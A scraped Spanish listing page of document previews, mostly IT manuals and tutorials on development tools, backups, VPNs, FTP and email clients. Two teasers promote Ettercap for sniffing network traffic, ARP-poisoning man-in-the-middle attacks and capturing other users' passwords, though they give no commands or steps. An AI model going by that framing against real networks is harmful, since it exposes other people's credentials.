Paso de Borland Turbo C (bajo DOS) a Anjuta (Linux) 1.

Paso de Borland Turbo C (bajo DOS) a Anjuta (Linux) 1. Paso de Borland Turbo C (bajo DOS) a Anjuta (Linux) 1. Anjuta es un entorno de desarrollo de C que podemos encontrar en cualquier distribución de GNU/Linux. Si nuestra distribución no dispone de ella,

Más detalles

Tutorial: Primeros Pasos con Subversion

Tutorial: Primeros Pasos con Subversion Tutorial: Primeros Pasos con Subversion Introducción Subversion es un sistema de control de versiones open source. Corre en distintos sistemas operativos y su principal interfaz con el usuario es a través

Más detalles

MANUAL DE FACTURACIÓN TOUCH SCREEN

MANUAL DE FACTURACIÓN TOUCH SCREEN MANUAL DE FACTURACIÓN TOUCH SCREEN Tabla de Contenido Contenido Pág. CAPITULO 1... 3 CARACTERÍSTICAS Y BENEFICIOS... 3 CAPITULO 2... 4 ENTRADAS Y SALIDAS DEL MODULO... 4 Visión general... 4 Contenido del

Más detalles

MANUAL DE AYUDA TAREA PROGRAMADA COPIAS DE SEGURIDAD

MANUAL DE AYUDA TAREA PROGRAMADA COPIAS DE SEGURIDAD MANUAL DE AYUDA TAREA PROGRAMADA COPIAS DE SEGURIDAD Fecha última revisión: Diciembre 2010 Tareas Programadas TAREAS PROGRAMADAS... 3 LAS TAREAS PROGRAMADAS EN GOTELGEST.NET... 4 A) DAR DE ALTA UN USUARIO...

Más detalles

MANUAL DE USUARIO TARIFICADOR SIPTAR Y REPORTES SIPTAR.

MANUAL DE USUARIO TARIFICADOR SIPTAR Y REPORTES SIPTAR. MANUAL DE USUARIO TARIFICADOR SIPTAR Y REPORTES SIPTAR. Fecha: Septiembre del 2006. CONTENIDO CONTENIDO...2 1. Ingreso al Tarificador SipTar....3 2. Utilidades del SipTar...5 3. Monitoreo Cabinas...18

Más detalles

Ettercap: Para instalación en ambientes Linux (aunque la mayoría de distribuciones ya las trae instaladas):

Ettercap: Para instalación en ambientes Linux (aunque la mayoría de distribuciones ya las trae instaladas): Ettercap: Este programa que nos permite sniffear el tráfico de red (capturar conversaciones, lectura de paquetes) y obtener así las contraseñas escritas por otros usuarios de nuestra red. Con el uso de

Más detalles

Prof. Dr. Paul Bustamante

Prof. Dr. Paul Bustamante Prácticas de C++ Practica Nº 10 Informática II Fundamentos de Programación Prof. Dr. Paul Bustamante INDICE 1.1 EJERCICIO 1: MI PRIMER FICHERO EN BINARIO... 1 1.2 EJERCICIO 2: LEYENDO MI PRIMER FICHERO

Más detalles

ACCESO AL SERVIDOR EXCHANGE MEDIANTE OWA

ACCESO AL SERVIDOR EXCHANGE MEDIANTE OWA ACCESO AL SERVIDOR EXCHANGE MEDIANTE OWA El Acceso al correo a través de OWA (Outlook Web Access) es una herramienta que permite a los usuarios consultar sus mensajes en una interfaz Web a través de un

Más detalles

Programa de encriptación WIFI.

Programa de encriptación WIFI. Programa de encriptación WIFI. En qué consiste la aplicación? Se trata de un programa que permite encriptar automáticamente la señal wifi del Cable MODEM router de ONO. Dónde se encuentra la aplicación?

Más detalles

Práctica 3: Estudio de los protocolos HTTP, SMTP, POP3 e IMAP mediante un analizador de red: Wireshark

Práctica 3: Estudio de los protocolos HTTP, SMTP, POP3 e IMAP mediante un analizador de red: Wireshark FUNDAMENTOS DE REDES DE COMPUTADORES Curso 2009/2010 Práctica 3: Estudio de los protocolos HTTP, SMTP, POP3 e IMAP mediante un analizador de red: Wireshark Introducción En esta práctica vamos a trabajar

Más detalles

SIEWEB. La intranet corporativa de SIE

SIEWEB. La intranet corporativa de SIE La intranet corporativa de SIE por ALBA Software Acceso a los servicios SIE desde páginas Web para los usuarios de sistema *. Administración del Sistema (cuentas de usuarios, permisos, servicios, etc...)

Más detalles

Programación Gráfica 2D ( IV ) Tilemapping.

Programación Gráfica 2D ( IV ) Tilemapping. Autor: Sergio Hidalgo serhid@wired-weasel.com Introducción Programación Gráfica 2D ( IV ) Tilemapping. Con el último tutorial ya terminé de explicar el funcionamiento de SDL y la programación gráfica en

Más detalles

RESUMEN DE CONCEPTOS BASICOS DE PROGRAMACION JAVA

RESUMEN DE CONCEPTOS BASICOS DE PROGRAMACION JAVA UNED Centro Asociado de Cádiz RESUMEN DE CONCEPTOS BASICOS DE PROGRAMACION JAVA 1. OBJETOS Cualquier elemento del programa es un objeto. Un programa es un conjunto de objetos que se comunican entre sí

Más detalles

Person IP CRM Manual MOBILE

Person IP CRM Manual MOBILE Manual MOBILE División Informática BuscPerson Telecomunicaciones : Manual MOBILE 0.- Introducción 3 0.1 Configuración de los terminales 3 0.2 Acceso de Usuarios 3 1.- Funcionalidades CRM 5 1.1 Agenda del

Más detalles

axtpv - Manual del usuario axtpv Profesional

axtpv - Manual del usuario axtpv Profesional axtpv Profesional 1 1. Introducción. axtpv POS Profesional es un producto para dispositivos Android creado para comercios de todo tipo, tanto de Restauración como de Retail. La funcionalidad puede cambiar

Más detalles

Firewall Firestarter. Establece perímetros confiables.

Firewall Firestarter. Establece perímetros confiables. Firewall Firestarter Qué es un Firewall? Un muro de fuego (firewall en inglés) es una parte de un sistema o una red que está diseñada para bloquear el acceso no autorizado, permitiendo al mismo tiempo

Más detalles

MANUAL DE AYUDA MODULO TALLAS Y COLORES

MANUAL DE AYUDA MODULO TALLAS Y COLORES MANUAL DE AYUDA MODULO TALLAS Y COLORES Fecha última revisión: Enero 2010 Índice TALLAS Y COLORES... 3 1. Introducción... 3 CONFIGURACIÓN PARÁMETROS TC (Tallas y Colores)... 3 2. Módulos Visibles... 3

Más detalles

Mejoras introducidas MARKETING GIO

Mejoras introducidas MARKETING GIO Mejoras introducidas MARKETING GIO El proceso lógico para hacer uso de la utilidad de marketing se tendrán en cuenta 3 puntos: 1. Segmentación de la base de datos de clientes, para determinar a quién va

Más detalles

Manual Sistema de Afiliados Lomas Travel

Manual Sistema de Afiliados Lomas Travel Manual Sistema de Afiliados Lomas Travel Contenido Registro de Afiliados... 3 Administración de su cuenta... 7 Ingresar... 7 Uso del Administrador... 8 Configuración de Plantilla... 9 1.-Opción de subir

Más detalles

Programa diseñado y creado por 2014 - Art-Tronic Promotora Audiovisual, S.L.

Programa diseñado y creado por 2014 - Art-Tronic Promotora Audiovisual, S.L. Manual de Usuario Programa diseñado y creado por Contenido 1. Acceso al programa... 3 2. Opciones del programa... 3 3. Inicio... 4 4. Empresa... 4 4.2. Impuestos... 5 4.3. Series de facturación... 5 4.4.

Más detalles

COPIAS DE SEGURIDAD CON COBIAN BACKUP INSTALACIÓN Y CONFIGURACIÓN

COPIAS DE SEGURIDAD CON COBIAN BACKUP INSTALACIÓN Y CONFIGURACIÓN COPIAS DE SEGURIDAD CON COBIAN BACKUP INSTALACIÓN Y CONFIGURACIÓN Qué es Cobian Backup? Cobian Backup es un programa multitarea que podemos usar para crear y restaurar copias de seguridad de nuestros archivos

Más detalles

Instalación de ActivePerl en MS Windows

Instalación de ActivePerl en MS Windows Instalación de ActivePerl en MS Windows Rubén Armañanzas Arnedillo ruben@aula325.com 26 de septiembre de 2002 1. Descarga de los ejecutables necesarios En primer lugar vamos a descargar los ficheros que

Más detalles

Configuracion Escritorio Remoto Windows 2003

Configuracion Escritorio Remoto Windows 2003 Configuracion Escritorio Remoto Windows 2003 Instalar y configurar servicio de Terminal Server en Windows 2003 Fecha Lunes, 25 diciembre a las 17:04:14 Tema Windows (Sistema Operativo) Os explicamos cómo

Más detalles

Para descargar la versión más reciente de Skype accedemos al sitio web de Skype y luego hacemos clic en Descargar Skype para escritorio de Windows.

Para descargar la versión más reciente de Skype accedemos al sitio web de Skype y luego hacemos clic en Descargar Skype para escritorio de Windows. Skype Skype: este servicio nos permite comunicarnos en forma sincrónica con nuestros contactos mediante mensajes instantáneos (chat) y realizando video llamadas. Skype Microsoft cuenta con un sistema de

Más detalles

Instalar protocolo, cliente o servicio nuevo. Seleccionar ubicación de red. Práctica - Compartir y conectar una carpeta

Instalar protocolo, cliente o servicio nuevo. Seleccionar ubicación de red. Práctica - Compartir y conectar una carpeta Configuración de una red con Windows Aunque existen múltiples sistemas operativos, el más utilizado en todo el mundo sigue siendo Windows de Microsoft. Por este motivo, vamos a aprender los pasos para

Más detalles

Manual de iniciación a

Manual de iniciación a DOCUMENTACIÓN Picasa y otras nubes Manual de iniciación a DROPBOX 1 Últimamente se ha hablado mucho de la nube y de cómo es el futuro de la Web. También se han presentado servicios y aplicaciones que ya

Más detalles

Control de presencia para terminal por huella dactilar

Control de presencia para terminal por huella dactilar Manual de software Control de presencia para terminal por huella dactilar Access FP (SOFTWARE PARA LECTOR DE HUELLA DACTILAR SIMON ALERT REF.: 8902003-039 y 8902004-039) (Versión de sofware 1.5) (Versión

Más detalles

Notas para la instalación de un lector de tarjetas inteligentes.

Notas para la instalación de un lector de tarjetas inteligentes. Notas para la instalación de un lector de tarjetas inteligentes. Índice 0. Obtención de todo lo necesario para la instalación. 3 1. Comprobación del estado del servicio Tarjeta inteligente. 4 2. Instalación

Más detalles

Crear cuentas de correo en Outlook 2010

Crear cuentas de correo en Outlook 2010 Crear cuentas de correo en Outlook 2010 1. En Outlook 2010, en la ficha Archivo Información, pulsamos en Agregar Cuenta 2. En la siguiente ventana seleccionamos Configurar manualmente las opciones del

Más detalles

La plantilla propone aprovechar esta estructura en común y sólo modificar el contenido del área del documento que sea diferente.

La plantilla propone aprovechar esta estructura en común y sólo modificar el contenido del área del documento que sea diferente. PLANTILLAS EN PHP El concepto de plantilla, es un criterio del desarrollo web que propone optimizar la cantidad de documentos HTML que se usan en el desarrollo de un sitio web. A lo largo de la navegación

Más detalles

PS.Vending Almacén Pocket PC

PS.Vending Almacén Pocket PC Versión 1.0 Enero 2013 Autor: Pedro Naranjo Rodríguez www.psvending.es Contenido Qué es PS.Vending Almacén Pocket PC?... 3 Funciona PS.Vending Almacén Pocket PC independiente de PS.Vending?... 3 Requisitos...

Más detalles

VPN sobre red local. Vicente Sánchez Patón I.E.S Gregorio Prieto. Tema 3 SAD

VPN sobre red local. Vicente Sánchez Patón I.E.S Gregorio Prieto. Tema 3 SAD Tema 3 SAD VPN sobre red local Vicente Sánchez Patón I.E.S Gregorio Prieto Tema 3 SAD a)instalación de un servidor VPN en Windows XP/7/ Windows 2003/2008 Server. Instalaremos el servicio VPN en Windows

Más detalles

Protocolo Traslado_envío datos personales

Protocolo Traslado_envío datos personales Protección de la información en mi ordenador. TrueCrypt aplicación para cifrar y proteger la información La manera de evitar los problemas derivados de que la información privada quede expuesta a personas

Más detalles

Proyecto Tecnológico Prof. Carolina Quinodóz 6º2º - TM

Proyecto Tecnológico Prof. Carolina Quinodóz 6º2º - TM Fuente: Revista Dr.Max Protocolo FTP El FTP es uno de los sistemas de almacenamiento y distribución de archivos más populares de Internet. La sencillez con la que se realizan el montaje y el acceso, permiten

Más detalles

BREVE INTRODUCCIÓN A IPSEC

BREVE INTRODUCCIÓN A IPSEC La seguridad ha sido, desde siempre, el gran caballo de batalla para los administradores de sistemas. Dentro de las múltiples soluciones que podemos implementar en nuestra instalación nos centraremos hoy

Más detalles

Integración KNX - LYNX

Integración KNX - LYNX Integración KNX - LYNX INTEGRACIÓN KNX - LYNX CONTENIDO 1 Introducción... 2 2 Material requerido... 2 3 Configuración del servidor Web Dominium KNX... 3 3.1 Configuración de la interfaz Ethernet... 4 3.2

Más detalles

Ministerio de Educación. Base de datos en la Enseñanza. Open Office. Módulo 5: Report Builder

Ministerio de Educación. Base de datos en la Enseñanza. Open Office. Módulo 5: Report Builder Ministerio de Educación Base de datos en la Enseñanza. Open Office Módulo 5: Report Builder Instituto de Tecnologías Educativas 2011 Informes con Oracle Report Builder En su configuración original, OpenOffice

Más detalles

Manual de Instalación y uso de FTP

Manual de Instalación y uso de FTP Manual de Instalación y uso de FTP Que es el FTP? El FTP es un sistema que nos permite de forma cómoda subir o bajar archivos a otra ubicación. Hay FTP públicos y privados, es decir en algunos todo el

Más detalles

Pero, vamos por partes. Lógicamente, lo primero que tendremos que hacer es entrar en nuestra cuenta de correo y pinchar en.

Pero, vamos por partes. Lógicamente, lo primero que tendremos que hacer es entrar en nuestra cuenta de correo y pinchar en. Siempre que queramos enviar un archivo por correo tenemos que tener en cuenta que todos los correos tienen una limitación de espacio. En el caso de yahoo son 25 MB por correo. Pero para facilitar el envío

Más detalles

ÍNDICE INDICE. MANUAL WinPoET. Manual de formularios en Manual WinPoET

ÍNDICE INDICE. MANUAL WinPoET. Manual de formularios en Manual WinPoET ÍNDICE INDICE MANUAL WinPoET Índice 1. Introducción 3 2. Windows 2000, 98 y ME - Instalación y configuración del WinPoET 3 3. Windows XP Configuración de la conexión 8 4. Windows XP - Comprobación de la

Más detalles

Paso 2 Una vez se ha completado la instalación y ejecutado el programa, veremos esto

Paso 2 Una vez se ha completado la instalación y ejecutado el programa, veremos esto Configuración de FTP con Filezilla El uso de FTP facilitara la forma de trabajar con nuestro servidor, los programas de FTP son una alternativa mas practica al gestor de archivos de nuestro panel de control,

Más detalles

Cómo crear un LiveCD de Windows XP/2k3

Cómo crear un LiveCD de Windows XP/2k3 Cómo crear un LiveCD de Windows XP/2k3 Bueno, voy a hablar de cómo crear un LiveCD de Windows XP/2k3 con el programa PeBuilder. Las ventajas de crearnos un LiveCD de WindowsXP/2k3 es que en tan solo un

Más detalles

Redes de Área Local: Configuración de una VPN en Windows XP

Redes de Área Local: Configuración de una VPN en Windows XP Redes de Área Local: Configuración de una VPN en Windows XP Tatiana Echegoyen Blasco Facultad de Informática UPV - Curso 2005/2006 Índice 1. Qué es una VPN?...2 2. Cómo funciona una VPN?...2 3. Por qué

Más detalles

Man In The Middle con Ettercap

Man In The Middle con Ettercap 1 de 10 01/12/2007 2:02 Man In The Middle con Ettercap MITM - Man In The Middle - Envenenamiento ARP - ARP spoofing - ARP poisoning, En este tutorial se explica cómo esnifar una red o un equipo en concreto

Más detalles

Internet, conceptos básicos

Internet, conceptos básicos Internet, conceptos básicos IP (INTERNET PROTOCOL) Toda computadora tiene un número que la identifica en una red, este número es lo que llamamos IP, una dirección de IP típica se ve de esta manera Direcciones

Más detalles

MANUAL DE USUARIO. Convocatoria 2013 Fundación para la Prevención de Riesgos Laborales IT-0103/2013 Prevengra 4

MANUAL DE USUARIO. Convocatoria 2013 Fundación para la Prevención de Riesgos Laborales IT-0103/2013 Prevengra 4 Convocatoria 2013 Fundación para la Prevención de Riesgos Laborales IT-0103/2013 Prevengra 4 MANUAL DE USUARIO Software de Integración Documental de Prevención de Riesgos Laborales para la PYME de Granada

Más detalles